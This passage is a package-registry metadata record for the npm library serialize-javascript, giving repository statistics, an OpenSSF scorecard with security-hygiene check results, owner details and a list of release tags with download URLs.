{"id":2347999,"name":"serialize-javascript","ecosystem":"npm","description":"Serialize JavaScript to a superset of JSON that includes regular expressions and functions.","homepage":"https://github.com/yahoo/serialize-javascript","licenses":"BSD-3-Clause","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/yahoo/serialize-javascript","keywords_array":["serialize","serialization","javascript","js","json"],"namespace":null,"versions_count":30,"first_release_published_at":"2014-09-16T16:06:10.211Z","latest_release_published_at":"2026-03-25T14:24:36.784Z","latest_release_number":"7.0.5","last_synced_at":"2026-04-13T16:14:08.533Z","created_at":"2022-04-10T00:31:32.592Z","updated_at":"2026-04-13T16:14:08.534Z","registry_url":"https://www.npmjs.com/package/serialize-javascript","install_command":"npm install serialize-javascript","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"7.0.5"}},"repo_metadata":{"id":20821165,"uuid":"24106944","full_name":"yahoo/serialize-javascript","owner":"yahoo","description":"Serialize JavaScript to a superset of JSON that includes regular expressions and 
functions.","archived":false,"fork":false,"pushed_at":"2026-03-25T14:24:20.000Z","size":311,"stargazers_count":2920,"open_issues_count":42,"forks_count":206,"subscribers_count":33,"default_branch":"main","last_synced_at":"2026-03-31T19:29:41.737Z","etag":null,"topics":["javascript","json","serialize","web"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yahoo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2014-09-16T16:07:16.000Z","updated_at":"2026-03-29T10:50:40.000Z","dependencies_parsed_at":"2026-03-15T18:02:37.037Z","dependency_job_id":null,"html_url":"https://github.com/yahoo/serialize-javascript","commit_stats":{"total_commits":146,"total_committers":29,"mean_commits":"5.0344827586206895","dds":0.7054794520547945,"last_synced_commit":"ca867414d8f54347c0c3edaf4299502c2824b67f"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/yahoo/serialize-javascript","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/manifests","owner_url":"https://rep
os.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/sbom","scorecard":{"id":1238763,"data":{"date":"2025-10-06","repo":{"name":"github.com/yahoo/serialize-javascript","commit":"bb0048c18a6aeab397b7ade2b6b8381d4d1f8487"},"scorecard":{"version":"v5.3.1-0.20251003215448-f542d69ba0cd","commit":"f542d69ba0cd01fcff1cc4395b9780f2476af14d"},"score":4.7,"checks":[{"name":"Code-Review","score":5,"reason":"Found 6/11 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":2,"reason":"2 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/test.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least 
privilege.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/yahoo/serialize-javascript/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/yahoo/serialize-javascript/test.yml/main?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best 
Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 
settings.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#sast"}}]},"last_synced_at":"2025-10-13T21:24:44.054Z","repository_id":20821165,"created_at":"2025-10-13T21:24:44.063Z","updated_at":"2025-10-13T21:24:44.063Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31328307,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-03T02:17:30.558Z","status":"ssl_error","status_checked_at":"2026-04-03T02:17:30.071Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while 
reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"yahoo","name":"Yahoo","uuid":"16574","kind":"organization","description":"This organization is the home to many of the active open source projects published by engineers at Yahoo Inc.","email":"ospo@yahooinc.com","website":"https://developer.yahoo.com/opensource","location":" We're working from home these days. Stay safe.","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/16574?v=4","repositories_count":204,"last_synced_at":"2024-12-31T07:28:06.423Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/yahoo","funding_links":[],"total_stars":52211,"followers":385,"following":0,"created_at":"2022-11-02T16:20:07.792Z","updated_at":"2024-12-31T07:28:06.423Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo/repositories"},"tags":[{"name":"v7.0.5","sha":"df3f1c1fa9ca16b050ae893cb63ac23c91deed55","kind":"tag","published_at":"2026-03-25T14:23:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.5","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/t
ags/v7.0.5/manifests"},{"name":"v7.0.4","sha":"eec32e08c5ac51bba2d8042101f6d2622c133110","kind":"tag","published_at":"2026-03-02T23:25:51.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.4","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.4/manifests"},{"name":"v7.0.3","sha":"d50571505a7776191346d714618867455b3354c1","kind":"tag","published_at":"2026-02-27T14:38:13.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.3","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.3/manifests"},{"name":"v7.0.2","sha":"44f544b85a8e2719890a0853184d83c4ecbc9bcb","kind":"tag","published_at":"2025-12-07T13:26:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.2/manifests"},{"name":"v7.0.1","sha":"f7fff15630a450dfcbcb88d33f7dc30b4f1e41f8","ki
nd":"tag","published_at":"2025-11-28T13:30:57.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.1/manifests"},{"name":"v7.0.0","sha":"bb0048c18a6aeab397b7ade2b6b8381d4d1f8487","kind":"tag","published_at":"2025-10-04T12:52:38.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.0/manifests"},{"name":"v6.0.2","sha":"b71ec23841d7cf30847d3071d9da38ee0b397fc8","kind":"tag","published_at":"2024-01-09T01:06:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v6.0.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"7139f9251b4cad52136513cf3360869e1e645d6c","kind":"tag","published_at":"2023-01-15T14:33:32.000Z","download_url":"https://codeload.github.
com/yahoo/serialize-javascript/tar.gz/v6.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"3302c443cd949750d4407a67ab869f8290ea3762","kind":"tag","published_at":"2021-06-21T13:54:27.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v6.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.0/manifests"},{"name":"v5.0.1","sha":"8eb19aa769b3b144bf8838bce58ac6e8b8ce3cb5","kind":"commit","published_at":"2020-09-10T12:52:36.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v5.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"282a3b82e82f2d3bb1e6e9500ad553700d7e4e69","kind":"commit","published_at":"2020-09-09T12:31:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v5.0.0","html_url":"https://github.com/yahoo/ser
ialize-javascript/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.0/manifests"},{"name":"v4.0.0","sha":"a8a458c9a98771005d9315f11b4fd6e61373de21","kind":"tag","published_at":"2020-06-08T13:39:29.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v4.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v4.0.0/manifests"},{"name":"v3.1.0","sha":"b54341e3f4be20b415148219767049173f0974d8","kind":"tag","published_at":"2020-05-28T11:36:04.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v3.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"f5957ee95b8e7d0d6a52b2185aece0b345aa0492","kind":"tag","published_at":"2020-02-16T13:36:13.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v3.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":nul
l,"purl":"pkg:github/yahoo/serialize-javascript@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.0.0/manifests"},{"name":"v2.1.2","sha":"6c43b02710bab8ddaf0d86dd2f9602af74ade7fc","kind":"tag","published_at":"2019-12-09T09:19:09.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"433fc9cafe375b3f376efd12730b226035c3ee3a","kind":"tag","published_at":"2019-12-05T09:39:51.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"31c98adc21a54f6900f9aa6a415731d1398637c1","kind":"tag","published_at":"2019-09-04T12:32:46.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.0","tag_url":"https://repos.ecosyste.ms
/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"c65dd4a3af3c8bf5a94d8c7e4746f0effec0a8ed","kind":"tag","published_at":"2019-09-04T12:08:42.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.0.0/manifests"},{"name":"v1.9.1","sha":"9ee6b1ca1f755594aab026d712f93d34f477b5e9","kind":"tag","published_at":"2019-09-04T12:06:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.9.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"84ad59ba37afca17b074388964b641a2424fc089","kind":"tag","published_at":"2019-08-29T12:37:14.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.9.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.0","manifests_url":
"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.0/manifests"},{"name":"v1.8.0","sha":"6eae8337d34099a7dde0d18f1584210a7768f14c","kind":"tag","published_at":"2019-08-20T12:50:34.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.8.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"423a382bd5d7f85c46ef395fc2cfde631959da32","kind":"tag","published_at":"2019-04-16T12:18:38.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.7.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.7.0/manifests"},{"name":"v1.6.1","sha":"35f64803a3a67662e16ad5260901d4e291260989","kind":"tag","published_at":"2018-12-28T07:33:43.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.6.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tag
s/v1.6.1/manifests"},{"name":"v1.6.0","sha":"8c10244f7bdf31b6052d6d8ded0eb7788809cc20","kind":"tag","published_at":"2018-12-24T14:32:50.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.6.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"1812f25c6267c2f8e7e18639513f27e68e5b648f","kind":"tag","published_at":"2018-04-18T00:04:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.5.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.5.0/manifests"},{"name":"v1.4.0","sha":"11fdd024ab3829f1b22d1ea76e4f7671b1f6df22","kind":"tag","published_at":"2017-07-15T12:43:04.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.4.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"457a4c6a04859fddea8dd4ae8422f73ade9da72e","kind
":"tag","published_at":"2016-05-31T21:52:27.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.3.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.3.0/manifests"},{"name":"v1.2.0","sha":"c5b0b9379ebbc317f33fee29e770a32ce58fbb6b","kind":"tag","published_at":"2016-02-29T23:35:37.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.2.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"e08289e667ab9a146b5dbabc3c0c3f31095549a3","kind":"tag","published_at":"2015-09-09T16:59:24.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.1.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fseri